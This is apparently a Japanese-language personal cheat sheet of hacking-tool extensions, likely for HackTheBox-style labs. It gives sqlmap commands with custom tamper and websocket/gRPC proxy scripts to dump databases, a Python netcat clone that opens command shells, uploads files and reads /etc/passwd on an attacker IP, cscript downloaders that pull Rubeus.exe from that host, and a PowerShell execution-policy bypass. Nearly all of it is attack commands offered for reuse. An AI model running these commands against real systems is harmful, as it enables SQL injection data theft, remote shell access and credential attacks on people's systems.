個人的ハックツールに付与できる拡張機能コードリスト
sqlmapコマンドのBasic Auth Base64 Request拡張機能コード
コマンド例
sqlmap -r ./req --tamper=./sqlmap_basic_auth.py --ignore-code=401 --level 5 --risk 3
リクエスト例
#req
GET http://example.htb/ HTTP/1.1
Content-Length: 0
---
Authorization: Basic *
websocketのプロトコルを介したsqlmapの実行。プロキシlocalhost:8081
を建て、そこからSQLi対象へwebsocket送ります。
コマンド例
# websocketインストール
pip install websockets
# プロキシ起動
python3 sqlmap_websocket.py
# sqlmap実行
sqlmap -u "http://localhost:8081/?id=1" --batch --dbs
gRPCのPort50051向けにgrpcurlコマンドを使ってペイロードを送信するHTTPプロキシツール。HTTPのPortは8051。
コマンド例:
# grpcurl インストール
$ go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest
# go mod整理
$ go mod init sqlmap/grpc
$ go mod tidy
# 起動
$ go run http2grpc.go
# sqlmap実行
sqlmap -u "http://localhost:8051/?id=1" --batch --dump
Python環境が存在(ほぼある)するターゲットで簡易的に足場を構築するためのもの
# 対話型コマンドシェルの起動
netcat.py -t 10.11.14.13 -p 4444 -l -c
# ファイルのアップロード
netcat.py -t 10.11.14.13 -p 4444 -l -u=mytest.whatisup
# コマンドの実行
netcat.py -t 10.11.14.13 -p 4444 -l -e=\"cat /etc/passwd\"
# 通信先サーバーの135番ポートに文字列を送信
echo 'ABCDEFGHI' | ./netcat.py -t 10.11.14.13 -p 135
# サーバーに接続
netcat.py -t 10.11.14.13 -p 4444
Windows標準で組み込まれているスクリプト言語を使ってWgetを実行する物
コマンド例:
#Javascript
cscript.exe /nologo wget.js hxxp://10.11.14.13/Rubeus.exe Rubeus.exe
#VBS
cscript.exe /nologo wget.vbs hxxp://10.11.14.13/Rubeus.exe Rubeus.exe
これを忘れないように
$ powershell -ep bypass